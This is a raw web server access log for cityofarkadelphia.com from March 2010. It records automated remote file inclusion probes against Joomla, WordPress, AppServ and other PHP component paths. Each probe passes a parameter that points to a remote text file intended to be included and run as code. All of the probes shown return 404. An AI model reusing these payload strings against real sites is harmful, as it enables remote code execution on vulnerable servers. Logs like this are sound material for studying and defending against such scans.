200.78.235.181 - - [01/Mar/2010:10:58:13 -0800] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:13 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:24 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:11:03:00 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:11:03:01 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:03:07 -0800] "GET /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:03:07 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:03:10 -0800] "GET /logs//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:04:24 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:04:24 -0800] "GET /components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:04:24 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:04:26 -0800] "GET /logs//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:18 -0800] "GET /components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:18 -0800] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:18 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:11:07:22 -0800] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:27 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:58 -0800] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:58 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:07:58 -0800] "GET /components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:08:58 -0800] "GET /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:08:58 -0800] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:08:58 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:09:10 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:09:11 -0800] "GET /logs//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:09:11 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:09:12 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:11:09:14 -0800] "GET /components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.205.6.233 - - [01/Mar/2010:11:09:26 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.205.6.233 - - [01/Mar/2010:11:09:26 -0800] "GET /appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.205.6.233 - - [01/Mar/2010:11:09:27 -0800] "GET /logs/access_090901.log//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.205.6.233 - - [01/Mar/2010:11:09:36 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.205.6.233 - - [01/Mar/2010:11:09:36 -0800] "GET /appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
210.205.6.233 - - [01/Mar/2010:11:09:36 -0800] "GET /logs/access_090901.log//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.152.217.250 - - [01/Mar/2010:11:12:29 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.152.217.250 - - [01/Mar/2010:11:12:29 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.152.217.250 - - [01/Mar/2010:11:12:29 -0800] "GET /logs/access_091001.log/convert/mvcw.php?step=1&vwar_root=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
190.152.217.250 - - [01/Mar/2010:11:12:38 -0800] "GET /logs/access_091231.log/convert/mvcw.php?step=1&vwar_root=http://www.vaconetwork.com/summit//administrator/components/com_extcalendar/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.12.33.30 - - [01/Mar/2010:11:12:58 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.12.33.30 - - [01/Mar/2010:11:12:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.12.33.30 - - [01/Mar/2010:11:12:59 -0800] "GET /logs/access_091101.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.12.33.30 - - [01/Mar/2010:11:13:15 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.12.33.30 - - [01/Mar/2010:11:13:15 -0800] "GET /logs/access_091101.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.12.33.30 - - [01/Mar/2010:11:13:16 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
221.141.1.113 - - [01/Mar/2010:11:32:20 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://calcetto5.maxdema.net//components/com_login/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:11:40:52 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:11:40:52 -0800] "GET /logs/access_090601.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:11:40:52 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [01/Mar/2010:11:41:31 -0800] "GET /appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [01/Mar/2010:11:41:31 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [01/Mar/2010:11:41:31 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.173.161.146 - - [01/Mar/2010:11:41:50 -0800] "GET /logs/access_090731.log//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.201.180.130 - - [01/Mar/2010:11:42:28 -0800] "GET /logs/access_091031.log//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
66.103.131.81 - - [01/Mar/2010:11:42:57 -0800] "GET /logs/access_091031.log//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:44:22 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:44:22 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:44:22 -0800] "GET /logs/access_091031.log//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:44:45 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:44:45 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:44:45 -0800] "GET /logs/access_091031.log//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.103.131.81 - - [01/Mar/2010:11:45:00 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:48:32 -0800] "GET /private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:48:32 -0800] "GET /logs//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:11:48:32 -0800] "GET /logs/access_091031.log//private/server///?_zb_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.115.6.11 - - [01/Mar/2010:11:51:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "cityofarkadelphia.com"
200.201.180.130 - - [01/Mar/2010:11:52:10 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
200.201.180.130 - - [01/Mar/2010:11:54:27 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
90.10.220.27 - - [01/Mar/2010:11:56:02 -0800] "GET /logs/access_090201.log HTTP/1.0" 200 1245184 "http://cityofarkadelphia.com/logs/access_090201.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:11:58:22 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:11:58:22 -0800] "GET /logs/access_100101.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:58:22 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:58:22 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:58:23 -0800] "GET /logs/access_100201.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:11:58:23 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:58:29 -0800] "GET /logs/access_091001.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:59:06 -0800] "GET /logs/access_100201.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:59:06 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:59:06 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:11:59:13 -0800] "GET /logs/access_091001.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.103.131.81 - - [01/Mar/2010:11:59:14 -0800] "GET /logs/access_091031.log//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
62.173.161.146 - - [01/Mar/2010:12:01:17 -0800] "GET /logs/access_091031.log//appserv/main.php?appserv_root=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:02:34 -0800] "GET /logs/access_100101.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:02:34 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.86.52.250 - - [01/Mar/2010:12:02:34 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [01/Mar/2010:12:03:59 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [01/Mar/2010:12:03:59 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [01/Mar/2010:12:03:59 -0800] "GET /logs/access_091001.log/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [01/Mar/2010:12:04:11 -0800] "GET /logs/access_091101.log/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.103.131.81 - - [01/Mar/2010:12:05:12 -0800] "GET /logs/access_091001.log//appserv/main.php?appserv_root=http://www.naotemprec0.com.br/idx3.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:12:08:26 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:12:08:27 -0800] "GET /logs/access_090401.log//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:12:08:27 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:12:10:24 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:12:10:24 -0800] "GET /logs/access_090401.log//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:12:10:24 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:12:10:36 -0800] "GET /logs/access_090401.log//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:12:10:36 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:12:10:36 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:11 -0800] "GET /logs///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:11 -0800] "GET /logs/access_090901.log///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:11 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:24 -0800] "GET /logs/access_090901.log///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:24 -0800] "GET /logs///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:24 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:28 -0800] "GET /logs/access_100201.log///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:12:15:36 -0800] "GET /logs/access_100201.log///administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:12:19:27 -0800] "GET /inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:12:19:31 -0800] "GET /logs//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:12:19:31 -0800] "GET /logs/access.log//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:12:19:57 -0800] "GET /inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:12:19:57 -0800] "GET /logs//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.158.246 - - [01/Mar/2010:12:19:57 -0800] "GET /logs/access.log//inc/sys.php?DROOT=http://www.iseulbi.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [01/Mar/2010:12:24:27 -0800] "GET /logs/access_081231.log%20%20/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.254.172.27 - - [01/Mar/2010:12:24:32 -0800] "GET /logs/access_090701.log/send_reminders.php?noSet=0&includedir=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.202.2.23 - - [01/Mar/2010:12:29:48 -0800] "GET /logs/send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.202.2.23 - - [01/Mar/2010:12:29:48 -0800] "GET /logs/access_081231.log%20%20/send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
204.202.2.23 - - [01/Mar/2010:12:29:48 -0800] "GET /send_reminders.php?noSet=0&includedir=http://www.anabolex.com/list-old/admin/temp/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
